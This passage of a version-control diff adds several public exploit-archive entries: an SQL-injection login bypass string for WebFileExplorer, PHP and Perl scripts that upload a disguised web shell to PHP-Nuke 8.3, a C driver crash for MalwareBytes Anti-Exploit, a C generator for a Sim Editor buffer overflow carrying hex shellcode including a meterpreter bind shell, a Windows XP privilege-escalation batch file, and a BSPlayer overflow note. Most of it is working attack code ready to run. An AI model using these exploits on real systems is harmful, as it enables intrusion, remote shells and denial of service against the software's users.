|
||||
|
||||
|
||||
Advisory URL:
|
||||
----------------------------------------------------------------------
|
||||
https://www.mogwaisecurity.de/#lab
|
||||
|
||||
|
||||
----------------------------------------------------------------------
|
||||
Mogwai, IT-Sicherheitsberatung Muench
|
||||
Steinhoevelstrasse 2/2
|
||||
89075 Ulm (Germany)
|
||||
|
||||
info@mogwaisecurity.de
|
12
platforms/php/webapps/35851.txt
Executable file
12
platforms/php/webapps/35851.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/48233/info
|
||||
|
||||
WebFileExplorer is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
WebFileExplorer 3.6 is vulnerable; other versions may also be affected.
|
||||
|
||||
Supplying the following input to the username or password field is sufficient to exploit these issues:
|
||||
|
||||
user: admin' or '1=1
|
||||
pass: anything
|
57
platforms/php/webapps/35853.php
Executable file
57
platforms/php/webapps/35853.php
Executable file
|
@ -0,0 +1,57 @@
|
|||
source: http://www.securityfocus.com/bid/48257/info
|
||||
|
||||
Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
|
||||
|
||||
Phpnuke 8.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
///////////////////////////////////////////////////
|
||||
#Iranian Pentesters Home
|
||||
#PHP Nuke 8.3 MT AFU Vulnerability
|
||||
#Coded by:4n0nym0us & b3hz4d
|
||||
#http://www.pentesters.ir
|
||||
///////////////////////////////////////////////////
|
||||
//Settings:
|
||||
$address = 'http://your-target.com';
|
||||
$file = 'shell.php.01';
|
||||
$prefix='pentesters_';
|
||||
|
||||
|
||||
//Exploit:
|
||||
@$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00";
|
||||
@$file_data .= file_get_contents($file);
|
||||
file_put_contents($prefix . $file, $file_data);
|
||||
$file = $prefix . $file;
|
||||
echo "\n" . "///////////////////////////////////" ."\n";
|
||||
echo " Iranian Pentesters Home" . "\n";
|
||||
echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n";
|
||||
echo "///////////////////////////////////" ."\n";
|
||||
$address_c = $address . '/includes/richedit/upload.php';
|
||||
$postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1");
|
||||
$data = post_data($address_c, $postdata);
|
||||
$start = strpos($data, "<img src=\"upload");
|
||||
if ($start != null)
|
||||
{
|
||||
$data = substr($data,$start + 10);
|
||||
$end = strpos($data, "\"");
|
||||
$data = substr($data,0,$end);
|
||||
echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n";
|
||||
}
|
||||
else
|
||||
echo "\n" . "Upload Failed!!!";
|
||||
function post_data($address, $data)
|
||||
{
|
||||
$curl = curl_init($address);
|
||||
curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)");
|
||||
curl_setopt($curl, CURLOPT_POST, 1);
|
||||
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
|
||||
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
|
||||
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
|
||||
$content = curl_exec($curl);
|
||||
curl_close($curl);
|
||||
return $content;
|
||||
}
|
||||
?>
|
||||
|
49
platforms/php/webapps/35854.pl
Executable file
49
platforms/php/webapps/35854.pl
Executable file
|
@ -0,0 +1,49 @@
|
|||
source: http://www.securityfocus.com/bid/48257/info
|
||||
|
||||
Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
|
||||
|
||||
Phpnuke 8.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/perl
|
||||
###################################################
|
||||
#//Iranian Pentesters Home
|
||||
#//PHP Nuke 8.3 MT AFU Vulnerability
|
||||
#//Coded by:4n0nym0us & b3hz4d
|
||||
#//http://www.pentesters.ir
|
||||
###################################################
|
||||
|
||||
|
||||
use LWP;
|
||||
use HTTP::Request::Common;
|
||||
print "\n" . "///////////////////////////////////" ."\n";
|
||||
print " Iranian Pentesters Home" . "\n";
|
||||
print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n";
|
||||
print "///////////////////////////////////" ."\n";
|
||||
print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n";
|
||||
my $url = $ARGV[0]."/includes/richedit/upload.php";
|
||||
my $filename = $ARGV[1];
|
||||
my $prefix = $ARGV[2];
|
||||
my $rfile = $prefix . $filename . ".gif";
|
||||
open fhandle, $ARGV[1] or die $!;
|
||||
while (<fhandle>){
|
||||
$shell .= $_;
|
||||
}
|
||||
close fhandle;
|
||||
open fhandle, ">", $rfile or die $!;
|
||||
print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell;
|
||||
close(fhandle);
|
||||
my $ua = LWP::UserAgent->new;
|
||||
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026");
|
||||
my $req = POST $url, Content_Type => 'form-data',
|
||||
Content => [
|
||||
upload => "1",
|
||||
path => 'images',
|
||||
pwd => "1",
|
||||
userfile => [ $rfile,$prefix . $filename ]
|
||||
];
|
||||
my $res = $ua->request($req);
|
||||
$between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12);
|
||||
print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between);
|
||||
exit;
|
71
platforms/windows/dos/35842.c
Executable file
71
platforms/windows/dos/35842.c
Executable file
|
@ -0,0 +1,71 @@
|
|||
/*
|
||||
|
||||
Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
|
||||
Date - 19th January 2015
|
||||
Discovered by - Parvez Anwar (@parvezghh)
|
||||
Vendor Homepage - https://www.malwarebytes.org
|
||||
Tested Version - 1.03.1.1220, 1.04.1.1012
|
||||
Driver Version - no version set - mbae.sys
|
||||
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
|
||||
OSVDB - http://www.osvdb.org/show/osvdb/114249
|
||||
CVE ID - CVE-2014-100039
|
||||
Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
|
||||
Fixed version - 1.05
|
||||
Fixed driver ver - no version set
|
||||
|
||||
*/
|
||||
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
||||
#define BUFSIZE 25
|
||||
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
HANDLE hDevice;
|
||||
char devhandle[MAX_PATH];
|
||||
DWORD dwRetBytes = 0;
|
||||
BYTE sizebytes[4] = "\xff\xff\xff\x00";
|
||||
BYTE *inbuffer;
|
||||
|
||||
|
||||
printf("-------------------------------------------------------------------------------\n");
|
||||
printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
|
||||
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
|
||||
printf("-------------------------------------------------------------------------------\n\n");
|
||||
|
||||
sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
|
||||
|
||||
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
|
||||
|
||||
memset(inbuffer, 0x41, BUFSIZE);
|
||||
memcpy(inbuffer, sizebytes, sizeof(sizebytes));
|
||||
|
||||
printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
|
||||
|
||||
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
|
||||
|
||||
if(hDevice == INVALID_HANDLE_VALUE)
|
||||
{
|
||||
printf("\n[-] Open %s device failed\n\n", devhandle);
|
||||
return -1;
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("\n[+] Open %s device successful", devhandle);
|
||||
}
|
||||
|
||||
printf("\n[~] Press any key to DoS . . .");
|
||||
getch();
|
||||
|
||||
DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
|
||||
|
||||
printf("\n[+] DoS buffer sent\n\n");
|
||||
|
||||
CloseHandle(hDevice);
|
||||
|
||||
return 0;
|
||||
}
|
135
platforms/windows/local/35821.txt
Executable file
135
platforms/windows/local/35821.txt
Executable file
|
@ -0,0 +1,135 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#define SIZE 65536
|
||||
|
||||
/*
|
||||
* Title: Sim Editor v6.6 Stack Based Buffer Overflow
|
||||
* Version: 6.6
|
||||
* Tested on: Windows XP sp2 en, Windows 8 64-bit
|
||||
* Date: 16-01-2015
|
||||
* Author: Osanda Malith Jayathissa
|
||||
* E-Mail: osanda[cat]unseen.is
|
||||
* Website: OsandaMalith.wordpress.com
|
||||
* CVE: CVE-2015-1171
|
||||
*/
|
||||
|
||||
const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1"
|
||||
"3231561503561583eefce2a496ab54"
|
||||
"46672c07cf821d15abc70ca9b88abc"
|
||||
"42ec3e36263830ff8d1e7f00209ed3"
|
||||
"c222622e17855be16ac49c1c849475"
|
||||
"6a3709f22e8428d424b45251fa41e9"
|
||||
"582bf96612d3712082e25632feadd3"
|
||||
"81752c32d8761e7ab749ae77c98e09"
|
||||
"68bce46915c73f13c142ddb382f505"
|
||||
"454663ce4923e7884db224a36a3fcb"
|
||||
"63fb7be8a7a7d891fe0d8eaee0ea6f"
|
||||
"0b6b187b2d36777abf4d3e7cbf4d11"
|
||||
"158ec6fe620f0dbb9d450fea3500da"
|
||||
"ae5bb331ec6530b38d9128b688deee"
|
||||
"2be14f9b4b566f8e262bff50d1a58b"
|
||||
"92";
|
||||
|
||||
/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
|
||||
const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
|
||||
"4a83effc315f11035f11e2ca04054e"
|
||||
"34f5d62fbd10e77dd9515ab2aa3457"
|
||||
"39feacec4fd6c345e500ed56cb8ca1"
|
||||
"954d70b8c9ad49731caf8e6eeffd47"
|
||||
"e44212ecb85e99be2ce77e744cc6d0"
|
||||
"0317c8d3c02341cc050f1b67fdfb9a"
|
||||
"a1cc04ad8d823a0100db7ba6fbae77"
|
||||
"d486a843a65c3d560016e5b2b0fb73"
|
||||
"30beb0f01ea347d514dfccd8fa6996"
|
||||
"fede324c9f479f23a098479b04d26a"
|
||||
"c831b9e23d7342f3290431c1f6bedd"
|
||||
"697e18198d55dcb570561c9fb6024c"
|
||||
"b71f2b07479ffe87170f5167c8ef01"
|
||||
"0f02e07e2f2d2a179e098670e2ad38"
|
||||
"dd6b4b50cd3dc3cd2f1adc6a4f4970"
|
||||
"22c7c69ef4e8d7b45644705f2d8645"
|
||||
"7e3283ee17a5597e55575dab0f97cb"
|
||||
"5786c06355ff272ca62a3ce532952b"
|
||||
"0ad215ac5cb815c4389845f14635fa"
|
||||
"aad2b5ab1f74dd5179b242a9ac42bf"
|
||||
"7c89c0c90af908";
|
||||
|
||||
const char *shells[] = { shell1, shell2 };
|
||||
const char *shell_names[] = { "MS Paint", "Bind Shell" };
|
||||
const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
|
||||
const size_t SHELLS_COUNT = 2;
|
||||
|
||||
int menu() {
|
||||
size_t shell_type = SHELLS_COUNT;
|
||||
puts("\b[?] Choose an Option: ");
|
||||
size_t i;
|
||||
for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]);
|
||||
scanf("%i", &shell_type);
|
||||
return shell_type;
|
||||
}
|
||||
|
||||
void banner() {
|
||||
static const char banner[] =
|
||||
" _____ _ _____ _ _ _ \n"
|
||||
"| __|_|_____ | __|_| |_| |_ ___ ___ \n"
|
||||
"|__ | | | | __| . | | _| . | _|\n"
|
||||
"|_____|_|_|_|_| |_____|___|_|_| |___|_|\n"
|
||||
"\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
|
||||
"[~] Author: Osanda Malith Jayathissa\n"
|
||||
"[~] E-Mail: osanda[cat]unseen.is\n"
|
||||
"[~] Website: OsandaMalith.wordpress.com\n\n";
|
||||
|
||||
fwrite(banner, sizeof(char), sizeof(banner) , stdout);
|
||||
}
|
||||
|
||||
void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
|
||||
size_t pattern_len = strlen(pattern);
|
||||
count *= pattern_len;
|
||||
if (count > dst_size) count = dst_size;
|
||||
if (pattern_len > dst_size) pattern_len = dst_size;
|
||||
|
||||
size_t i, pI;
|
||||
for (i = 0, pI = 0; i < count ; i++, pI++) {
|
||||
if (pI == pattern_len) pI = 0;
|
||||
dst[i] = pattern[pI];
|
||||
}
|
||||
}
|
||||
|
||||
int main() {
|
||||
banner();
|
||||
int shell_type = menu();
|
||||
if (shell_type >= SHELLS_COUNT) {
|
||||
printf("[-] Enter a valid input\n");
|
||||
exit (1);
|
||||
}
|
||||
|
||||
char *buff = (char*) calloc (SIZE, sizeof(char));
|
||||
char *nops = (char*) calloc (SIZE, sizeof(char));
|
||||
if (!buff || !nops) exit (1);
|
||||
|
||||
patternfill(buff, "41", 405, SIZE);
|
||||
patternfill(nops, "90", 16, SIZE);
|
||||
|
||||
char ret[] = "B3804200";
|
||||
const char* filename = "exploit.sms";
|
||||
|
||||
FILE *outfile = fopen(filename, "w");
|
||||
if (!outfile) {
|
||||
printf("%s\n","Could not open file");
|
||||
exit (1);
|
||||
}
|
||||
|
||||
fputs(buff, outfile);
|
||||
fputs(ret, outfile);
|
||||
fputs(nops, outfile);
|
||||
|
||||
fputs(shells[shell_type], outfile);
|
||||
printf("%s", shell_info[shell_type]);
|
||||
fclose(outfile);
|
||||
free(buff);
|
||||
printf("[+] Successfully to written to: \"%s\"\n", filename);
|
||||
return 0;
|
||||
}
|
||||
/*EOF*/
|
31
platforms/windows/local/35850.bat
Executable file
31
platforms/windows/local/35850.bat
Executable file
|
@ -0,0 +1,31 @@
|
|||
source: http://www.securityfocus.com/bid/48232/info
|
||||
|
||||
Microsoft Windows is prone to a local privilege-escalation vulnerability.
|
||||
|
||||
A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
|
||||
|
||||
@echo off
|
||||
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
|
||||
start time /T > time.txt
|
||||
tskill explorer
|
||||
time 13:36:59 > nul
|
||||
at 13:37 /interactive cmd.exe
|
||||
at 13:37 /interactive explorer.exe
|
||||
at 13:37 /interactive at /del /y
|
||||
cls
|
||||
at 13:37 /interactive cmd.exe
|
||||
at 13:37 /interactive explorer.exe
|
||||
at 13:37 /interactive at /del /y
|
||||
cls
|
||||
at 13:37 /interactive cmd.exe
|
||||
at 13:37 /interactive explorer.exe
|
||||
at 13:37 /interactive at /del /y
|
||||
cls
|
||||
at 13:37 /interactive cmd.exe
|
||||
at 13:37 /interactive explorer.exe
|
||||
at 13:37 /interactive at /del /y
|
||||
|
||||
|
||||
echo [*] Backup time
|
||||
time < time.txt
|
||||
|
31
platforms/windows/remote/35841.txt
Executable file
31
platforms/windows/remote/35841.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: Bsplayer HTTP Response BOF
|
||||
# Date: Jan 17 ,2015
|
||||
# Exploit Author: Fady Mohamed Osman (@fady_osman)
|
||||
# Vendor Homepage: www.bsplayer.com
|
||||
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
|
||||
# Version: current (2.68).
|
||||
# Tested on: Windows 7 sp1 x86 version.
|
||||
# Exploit-db : http://www.exploit-db.com/author/?a=2986
|
||||
# Youtube : https://www.youtube.com/user/cutehack3r
|
||||
|
||||
Exploit: http://www.exploit-db.com/sploits/35841.tar.gz
|
||||
|
||||
Bsplayer suffers from a buffer overflow vulnerability when processing the
|
||||
HTTP response when opening a URL. In order to exploit this bug I needed to
|
||||
load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed
|
||||
that one of the dlls that matches this criteria is (MSVCR71.dll) and it's
|
||||
loaded when I loaded an flv file over the network and that's why I'm
|
||||
sending a legitimate flv file first so later we can use the loaded dll.
|
||||
Also the space after the seh record is pretty small so what I did is that I
|
||||
added a small stage shell cdoe to add offset to esp so it points at the
|
||||
beginning of my buffer and then a jmp esp instruction to execute the actual
|
||||
shellcode.
|
||||
|
||||
|
||||
--
|
||||
|
||||
*Regards,*
|
||||
|
||||
Fady Osman
|
||||
about.me/Fady_Osman
|
||||
<http://about.me/Fady_Osman>
|
Loading…
Add table
Reference in a new issue